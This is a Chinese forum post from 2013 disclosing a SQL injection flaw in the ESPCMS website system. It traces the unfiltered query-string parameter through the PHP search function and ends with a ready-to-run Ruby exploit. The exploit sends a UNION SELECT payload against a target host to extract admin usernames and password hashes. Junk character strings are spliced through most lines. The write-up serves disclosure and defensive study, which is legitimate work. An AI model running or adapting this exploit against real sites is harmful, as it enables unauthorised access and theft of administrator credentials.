0×0 漏洞概述0×1 漏洞细节/ z2 A( j- A7 ], r+ F0 t: Q
0×2 PoC \. Q. O1 c( z! l% t [5 Z
/ t7 J! a: N, W; w
* [ K! g J0 N; ]5 G* \( |/ y7 O" b# `3 u$ d, i. Q3 ]* @; j) Q
0×0 漏洞概述9 }% n) \3 H9 o7 n. O
: x& _: k; a6 v- Z8 S" S% _' {7 O易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。& [3 k6 a; b" C5 K \
其在处理传入的参数时考虑不严谨导致SQL注入发生
( t c4 b5 u( J- b8 U! o; _) }
3 t% O+ N2 m) t$ d
7 g3 G4 ^3 U9 ?- T7 \, h9 z0×1 漏洞细节" g, H7 L. J0 G" v
0 f; e9 ]1 z, ]) n变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
) O+ i5 H: [) {$ j1 U正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
: C( D2 @% W. m: _, ~- k7 T/ I而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。: |& }% u/ `1 s+ V' J$ m. f
2 i7 o- y- t9 O% D! ]' d在/interface/3gwap_search.php文件的in_result函数中:
3 [& ^! p, c* V, v' v( S3 a u
6 L7 \, n; y5 i, i3 {5 E0 O e. H8 ?: `, X# w
% a# ^' F {$ c# ^9 y: S5 ]
function in_result() {* J) m% p) ?* U$ L! P- v
... ... ... ... ... ... ... ... ...8 G' S; b1 {+ u# S
$urlcode = $_SERVER[ 'QUERY_STRING '];/ G/ G" A) G' M/ c" p% j
parse_str(html_entity_decode($urlcode), $output);
/ s1 r8 @5 W3 T& `
. p+ ?4 e0 @; |1 W- o- I$ G$ O0 P ... ... ... ... ... ... ... ... ...- A- D2 Y7 L( n3 O2 Q g: k/ O
if (is_array($output['attr' ]) && count($output['attr']) > 0) {( q5 q0 p; \( w0 }- i* v6 k) P
. }$ Z& l' {. O7 x6 H
$db_table = db_prefix . 'model_att';2 e- P( k S2 ?1 \) X& T# F
3 T) I. A" t2 C$ j* b4 R! m M foreach ($output['attr' ] as $key => $value) {
+ B; k+ T" N L, L. [ if ($value) {( p! Q: L( {% M/ t8 `
) H0 c/ g4 K* e& t
$key = addslashes($key);; T; i7 V+ n% n6 @
$key = $this-> fun->inputcodetrim($key);
1 y+ G% L9 y) a; [" @* D $db_att_where = " WHERE isclass=1 AND attrname='$key'";
" Z* X3 k. H2 E' Z* ] $countnum = $this->db_numrows($db_table, $db_att_where);
# C: _* K" P$ W# b" T( U- y! f if ($countnum > 0) {, _- r5 X8 [6 Q3 d
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;& i5 }" ^! _0 y3 ^- p: n z
}
d1 z" T; m: l7 u }
$ c0 i+ u* i" H& j }# N! P! {, F8 @4 @/ T
}2 c) |& F9 A" _( g. F- Z' l
if (!empty ($keyword) && empty($keyname)) {% E) c1 r. U4 M( z# w
$keyname = 'title';
+ Y9 T6 X- g& `7 y* s7 e/ |4 O( K% l* p $db_where.= " AND a.title like '%$keyword%'" ;5 l0 K( `/ j* q4 g
} elseif (!empty ($keyword) && !empty($keyname)) {
* m0 S, E7 Y, U2 R: H $db_where.= " AND $keyname like '% $keyword%'";
2 b/ ?+ t( o# C% D3 \, J Y# g }9 s, |# t2 Z9 g9 q/ {7 q
$pagemax = 15;
+ Z7 {8 ?9 Y; Q8 m' r3 H! c
5 h! {1 R1 N5 l; {0 M $pagesylte = 1;
# h) H, o+ R; _9 ^$ ~- I' l/ F; |' \ r$ ]4 h- J
if ($countnum > 0) {4 h) G' F4 j. d
; x/ F' J/ z( P" g& H6 ]$ z' l2 V
$numpage = ceil($countnum / $pagemax);" d0 h9 ?0 d' _4 _8 d: O8 E# ^
} else {/ u( Q+ }* u( x2 T! N1 f
$numpage = 1;
, {$ y* e# D( d2 n }4 J) o) w @! ]2 J1 u7 J. F8 ~
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
% B- D# w& V! c" ] $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$ r; z* ]) y1 o. {7 f: Q1 C- c& _: _$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
5 R2 d8 R4 C% m1 O0 g ... ... ... ... ... ... ... ... ...
5 N' `* P r: N, x' R+ ]4 e }2 ~! f5 w; Q. I' ^. W
+ |# k) p3 @& f' R5 g
+ j! g. C: H$ o- ]7 S0×2 PoC9 |5 b3 W; ^9 l+ d" A: d" l
- |7 h) @1 v5 H! s# A" o
1 _4 j" E, k0 @1 g0 t3 `& c$ x# Y- J2 H* {
require "net/http"
5 H- o& H' M6 v1 B; D, r; v2 p! i
def request(method, url)
6 u4 D% }0 p$ U# M if method.eql?("get")
0 W: W$ O6 q1 v+ i6 e3 r uri = URI.parse(url)
6 C( C6 G* Y9 j4 r; g3 j http = Net::HTTP.new(uri.host, uri.port)# @: }; s; D; P) y# e; S) @' X
response = http.request(Net::HTTP::Get.new(uri.request_uri)) F* `5 v" Y# u' Y
return response
" E% k7 @4 t0 N0 u! E- M+ S end
" S' [8 ~% n9 P/ Y9 j. F; U" u) p% Gend v& D) b' d% N
- T0 l9 g6 r1 w8 sdoc =<<HERE& N1 X4 j- y2 ]) b* a& E
-------------------------------------------------------
2 _+ F* j; g' ^5 z2 REspcms Injection Exploit6 Y8 L1 `5 d- `8 l) m. F7 i* n' b
Author:ztz4 [# \( _0 v$ ~6 A5 N
Blog:http://ztz.fuzzexp.org/( u+ o% _" B' P
-------------------------------------------------------
( {5 I! ]( l' U1 g7 G
) t }: W% t Y$ I0 BHERE
0 m# z2 y# a- m" _
' _# {5 B. P0 |+ ousage =<<HERE
) Z/ i; M3 P+ [. T d# RUsage: ruby #{$0} host port path; W4 q0 I1 U6 ]! U. ?& N/ [
example: ruby #{$0} www.target.com 80 /; c- S1 L1 G0 g
HERE
1 w3 n) |7 `+ _- _/ U8 X' I/ n) o! L
: p4 d' Z2 R( J x' H8 xputs doc7 a& a* J( P- C8 D# I6 K* H
if ARGV.length < 3/ q& W0 }3 Z/ |
puts usage
# m& r9 q& O0 l( h& {1 E; ]- Q, nelse
; X, o; F2 K# Q5 w. U $host = ARGV[0]
7 B6 {2 l5 l5 [* |4 K6 K/ z9 M $port = ARGV[1]6 L5 k% Q0 J/ t* P4 v6 \
$path = ARGV[2]8 |! h- \! {# z* Q
y- }& L A) S) f+ \" B
puts "send request..."/ E' U1 t( { @
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
5 n& b; k" @8 Z5 a) l" a( Qattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13& J: P C4 m) e, C
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27 s! q& g B: m- c; u
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
+ h: H6 L+ Q# g3 O response = request("get", url)
7 L" ^9 v7 {' o. j result = response.body.scan(/\w+&\w{32}/)
6 }, ]/ y% h& Y. X' x puts result
7 d, A/ c3 u( o- n! u6 I7 Hend
& `( ]$ J% W* P7 R- | ^
( J/ E! L8 j" r |
发表于 2013-7-27 18:31:52
收藏
支持
反对